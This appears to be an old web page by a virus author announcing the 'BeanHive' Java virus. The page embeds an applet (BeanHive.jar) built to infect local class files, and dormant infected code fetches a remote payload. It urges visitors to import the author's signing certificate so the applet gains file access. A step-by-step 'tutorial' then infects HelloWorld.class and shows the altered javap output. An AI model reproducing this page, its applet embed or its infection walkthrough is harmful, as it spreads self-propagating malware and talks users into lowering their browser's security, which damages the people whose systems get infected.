<HTML>
<HEAD>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
   <META NAME="GENERATOR" CONTENT="Mozilla/4.05 [en] (Win95; I) [Netscape]">
   <TITLE>Landing Camel International</TITLE>
</HEAD>
<BODY TEXT="#000000" BGCOLOR="#CCCCCC" LINK="#000000" VLINK="#000000" ALINK="#000000">
&nbsp;
<CENTER><TABLE COLS=1 WIDTH="600" BGCOLOR="#FFFFFF" >
<TR>
<TD>
<CENTER><IMG SRC="landingcamel.jpg" BORDER=0 HEIGHT=261 WIDTH=518></CENTER>

<CENTER>&nbsp;</CENTER>

<CENTER><TABLE CELLSPACING=0 CELLPADDING=0 COLS=1 WIDTH="450" >
<TR>
<TD><B><FONT FACE="Arial,Helvetica"><FONT SIZE=+3>::about</FONT></FONT></B>&nbsp;

<P><FONT FACE="Arial,Helvetica">Greetings to all virus writers and java
programmers who have taken time out of their busy schedules to view my
latest creation.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">This new virus, named the BeanHive virus
for reasons explained below, is revolutionary in demonstrating the immense
power that java viruses can gain over the host platform.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">The BeanHive consists of two types of Beans,
the Queen and the Workers ( these are not actually java beans, I just needed
a good name, apologies to all programmers who are offended by my blatent
disregard for the truth). The Workers have the solemn duty of sitting around
dormant within java class files until they are executed. When this occurs
he awakens to find himself without his Queen. He rectifies this situation
by attempting to communicate with her across the internet. If contact is
established then the Queen travels across the expanse of the internet to
wherever the Worker is located. The Worker then returns to his peaceful
slumber whilst the Queen prepares to colonise the new hive that the Worker
has discovered. After completing her task she returns to the big BeanHive
in the sky, awaiting her next calling.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">You may be wondering what on earth all
of this means, well you'll just have to wait until the next codebreakers
release, or until one of the antivirus companies comes up with an explanation,
or even better yet you can download it and find out for yourself.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">Cheers,</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">Landing Camel</FONT>&nbsp;
<P><BR>
<P><B><FONT FACE="Arial,Helvetica"><FONT SIZE=+2>::download</FONT></FONT></B>&nbsp;

<P><FONT FACE="Arial,Helvetica">The most prevalent comment from my fellow
colleagues regarding the Strange Brew virus was that they didn't understand
why applets could not be infected, and why web browsers could not be used
to infect files. Although I am going to duck the first question I am pleased
to announce that users of both Netscape Navigator and Microsoft Internet
Explorer can utilise specially designed applets to infect local java class
files.&nbsp;</FONT>&nbsp;
<P><FONT FACE="Arial,Helvetica">
<a href="x509.cacert">Click Here to Import My Object-Signing Test Certificate</a>
<P></FONT>

<P><FONT FACE="Arial,Helvetica">Ensure that your browser supports java
and click on the button below.</FONT>&nbsp;
<P>
<CENTER>
<APPLET CODE="BeanHiveApplet"
		WIDTH=400
		HEIGHT=30
		ARCHIVE="BeanHive.jar">

	<PARAM
		name="ApplicationClass"
		value="BeanHiveFrame">
		
        <PARAM NAME=cabbase VALUE=BeanHive.cab>
		
</APPLET>
</CENTER>
<P><BR>
<P><B><FONT FACE="Arial,Helvetica"><FONT SIZE=+2>::tutorial</FONT></FONT></B>&nbsp;

<P><FONT FACE="Arial,Helvetica">What's that you say? You don't know anything
about java? Don't worry your little head about it, since most people are
ignorant of this wonderful programming language I have decided to give
you a fun little exercise that will undoubtedly be the highlight of your day.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">1. Download the files HelloWorld.class
and javap.exe to your local hard drive from <A HREF="tutorial.zip">here</A>.</FONT>&nbsp;

<P><FONT FACE="Arial,Helvetica">2. Execute the command </FONT><FONT FACE="Courier New,Courier"><FONT SIZE=-1>javap
HelloWorld </FONT></FONT><FONT FACE="Arial,Helvetica">as seen below.</FONT>&nbsp;
<BR>&nbsp;
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>C:\Java>javap HelloWorld</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>Compiled from HelloWorld.java</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>public class HelloWorld
extends java.lang.Object {</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; public
static void main(java.lang.String[]);</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; public
HelloWorld();</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>}</FONT></FONT>

<P><FONT FACE="Arial,Helvetica">3. Infect HelloWorld.class using the BeanHive
demonstration applet above.</FONT><FONT FACE="Arial,Helvetica"></FONT>

<P><FONT FACE="Arial,Helvetica">4. Execute the command </FONT><FONT FACE="Courier New,Courier"><FONT SIZE=-1>javap
HelloWorld</FONT></FONT><FONT FACE="Arial,Helvetica"> as seen below.&nbsp;</FONT><FONT FACE="Arial,Helvetica"></FONT>

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>C:\Java>javap HelloWorld</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>Compiled from HelloWorld.java</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>public class HelloWorld
extends java.lang.ClassLoader {</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; public
static void main(java.lang.String[]);</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; public
synchronized java.lang.Class&nbsp;</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
loadClass(java.lang.String, boolean);</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; public
HelloWorld();</FONT></FONT>
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>}</FONT></FONT><FONT FACE="Arial,Helvetica"></FONT>

<P><FONT FACE="Arial,Helvetica">5. Congratulations! You are the proud owner
of the BeanHive virus. Be sure to feed it twice a day, and give it lots
of love and attention.</FONT></TD>
</TR>
</TABLE></CENTER>

<CENTER>&nbsp;</CENTER>

<CENTER>&nbsp;</CENTER>
&nbsp;</TD>
</TR>
</TABLE></CENTER>
&nbsp;
</BODY>
</HTML>
